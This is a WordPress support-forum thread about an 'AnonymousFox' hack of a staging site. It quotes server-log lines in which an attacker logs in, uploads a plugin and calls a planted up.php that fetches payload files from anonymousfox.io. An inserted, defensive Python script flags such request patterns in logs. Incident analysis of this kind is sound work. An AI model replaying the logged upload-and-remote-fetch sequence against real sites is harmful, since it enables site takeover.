• Hi, today a website I’m working on got strangely hacked.

    The website is blocked to search engines. I’m using the _underscores theme as a base to create a custom theme.

    I have just these plugins installed:

    • Disable Comments
    • Meta Box
    • Yoast Duplicate Post
    • Yoast SEO

    Today my password changed and my username became “AnonymousFox”.
    Thanks to another administrator we deleted this account and created another one for me with a different password than before.

    I know that “AnonymousFox” is related to the old exploit of WordPress 5.5 and the plugin “WP File Manager” (https://www.brightvessel.com/anonymous-fox-wordpress-5-5-hack-should-i-be-concerned/).

    The point is that my WordPress version was up-to-date and I didn’t have “WP File Manager” installed.

    After some investigations we found a plugin called Three Column Screen Layout. It was disabled and after looking at the files we found out that there was some malicious code. We deleted it.

    Then we found these requests in the server log from a different IP address than ours:

    
    200 - POST /wp-login.php HTTP/1.0
    200 - GET  /wp-admin/ HTTP/1.0
    200 - GET  /wp-admin/plugin-install.php?tab=upload HTTP/1.0
    200 - POST /wp-admin/update.php?action=upload-plugin HTTP/1.0
    200 - GET  /wp-content/plugins/aekwrpxkla/up.php HTTP/1.0
    500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0
    500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0
    500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0
    200 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0
    500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0
    200 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0
    

    So, my question is: how did they manage to upload this malicious plugin and change my username and password?

    Looking at the log it seems that they just logged in, uploaded the hacked plugin and called one of the malicious files.

    We used WordFence and Quttera malware scanner without finding anything suspicious.

    What could have happened? Was my password too weak? Does one of the installed plugins have an exploit?

    Thanks for the help and for reading this much.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Anonymous User 17160716

    (@anonymized-17160716)

    Pacicio, hi there.

    What could have happened?

    It may well be that your site was hacked a long time ago, and some malicious activity has just begun. This happens quite often, especially if no action was taken during a new big “wave” of hacks, or some malicious injections were not found and removed.

    We used WordFence and Quttera malware scanner without finding anything suspicious.

    Those solutions are really easy to bypass, so don’t be surprised.

    Was my password too weak? Does one of the installed plugins have an exploit?

    Yes, as a possible case. Your password or another privileged user – doesn’t matter.

    Thread Starter Pacicio

    (@pacicio)

    It may well be that your site was hacked a long time ago

    This is unlikely. The website is a fresh installation made less than one month ago and we installed nothing but the plugins listed.

    This is what scares me most. A fresh installation with trusted plugins that got hacked. Past hacks always involved some bugged plugin or something else, but this time it feels so strange.

    I would like to understand where the possible exploit could be to prevent those things in the future.

    We enabled some server-side security improvements, but we usually do these on published websites because we don’t expect hacks on development websites. Evidently we were wrong.

    Anonymous User 17160716

    (@anonymized-17160716)

    Pacicio,

    This is what scares me most.

    You know, bad things happen sometimes 🙂 If your website was created quite recently, then the access and error logs have probably also been preserved. You should double check them to get as much information as possible about the first suspicious requests to your website.

    we don’t expect hacks on development websites

    On dev websites, weak passwords are often used, and not only for the dashboard.
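    Following the advice above to go back over the access logs, here is an added triage script (not from the thread or any of its posters) that parses lines in the same "status - METHOD path HTTP/x" shape as the opening post's excerpt and flags the sequence visible there: a login POST immediately followed by dashboard access, a plugin upload through update.php, requests into a plugin directory the owner never installed, and a query parameter that references a remote host and path. The sample log, the plugin directory name and the remote host are constructed placeholders, and the set of known plugin slugs is an assumption matching the four plugins listed in the opening post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in the same "status - METHOD target HTTP/x" shape as the
# thread's excerpt. The plugin directory name and the remote host are placeholders.
SAMPLE_LOG = """\
200 - GET  /wp-login.php HTTP/1.0
200 - POST /wp-login.php HTTP/1.0
200 - GET  /wp-admin/ HTTP/1.0
200 - GET  /wp-admin/plugin-install.php?tab=upload HTTP/1.0
200 - POST /wp-admin/update.php?action=upload-plugin HTTP/1.0
200 - GET  /wp-content/plugins/wordpress-seo/css/dist/admin-global.css HTTP/1.0
200 - GET  /wp-content/plugins/zzrandomzz/up.php HTTP/1.0
500 - POST /wp-content/plugins/zzrandomzz/up.php?php=example.invalid/stage2.txt HTTP/1.0
200 - POST /wp-content/plugins/zzrandomzz/up.php?php=example.invalid/stage1.txt HTTP/1.0
"""

LINE_RE = re.compile(r"^(?P<status>\d{3}) - (?P<method>[A-Z]+)\s+(?P<target>\S+) HTTP/")
PLUGIN_DIR_RE = re.compile(r"^/wp-content/plugins/([^/]+)/")
# A query value that looks like "host.tld/path", with or without a scheme.
REMOTE_REF_RE = re.compile(r"^(?:https?://)?[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?::\d+)?/")

# Directory slugs of the plugins the owner knows they installed (assumed here;
# the four names correspond to the plugins listed in the opening post).
KNOWN_PLUGIN_SLUGS = {"disable-comments", "meta-box", "duplicate-post", "wordpress-seo"}


def parse_log(text):
    """Turn the excerpt format into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        url = urlsplit(m["target"])
        entries.append({
            "status": int(m["status"]),
            "method": m["method"],
            "path": url.path,
            "query": parse_qs(url.query),
        })
    return entries


def triage(entries, known_slugs=KNOWN_PLUGIN_SLUGS):
    """Return (line_index, category, note) for each request worth a closer look."""
    findings = []
    for i, e in enumerate(entries):
        # 1. Credentials accepted: a POST to wp-login.php directly followed by wp-admin.
        if e["method"] == "POST" and e["path"] == "/wp-login.php":
            nxt = entries[i + 1] if i + 1 < len(entries) else None
            if nxt is not None and nxt["path"].startswith("/wp-admin/"):
                findings.append((i, "login", "POST to wp-login.php followed by wp-admin access"))
        # 2. A plugin ZIP uploaded through the dashboard.
        if (e["method"] == "POST" and e["path"] == "/wp-admin/update.php"
                and e["query"].get("action") == ["upload-plugin"]):
            findings.append((i, "plugin-upload", "plugin uploaded via update.php?action=upload-plugin"))
        # 3. Requests into a plugin directory the owner never installed.
        m = PLUGIN_DIR_RE.match(e["path"])
        if m and m.group(1) not in known_slugs:
            findings.append((i, "unknown-plugin", f"request into unknown plugin directory '{m.group(1)}'"))
        # 4. A query parameter carrying a remote host/path (a second-stage fetch pattern).
        for key, values in e["query"].items():
            for value in values:
                if REMOTE_REF_RE.match(value):
                    findings.append((i, "remote-ref", f"parameter '{key}' references remote resource {value}"))
    return findings


def summarize(findings):
    """Count findings per category so the overall pattern is visible at a glance."""
    counts = {}
    for _, category, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for idx, category, note in triage(entries):
        e = entries[idx]
        print(f"line {idx + 1}: [{category}] {e['status']} {e['method']} {e['path']} -- {note}")
    print(summarize(triage(entries)))
```

    Run against a real access log, the "login" finding is the one to pivot on: the source address and timestamp of that POST tell you which credential was used and when, and whether the same address appears in earlier failed attempts, which is what separates a guessed or reused password from something else. The unknown-plugin check is only as good as the slug list, so populate it from the actual wp-content/plugins directory listing rather than from memory.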

    I’ve been following this post – @pacicio have you thought about scanning and potentially cleaning the computers and/or workstations that the site was built on or where you have worked?

  • The topic ‘AnonymousFox hack on staging website with almost no plugins. How?’ is closed to new replies.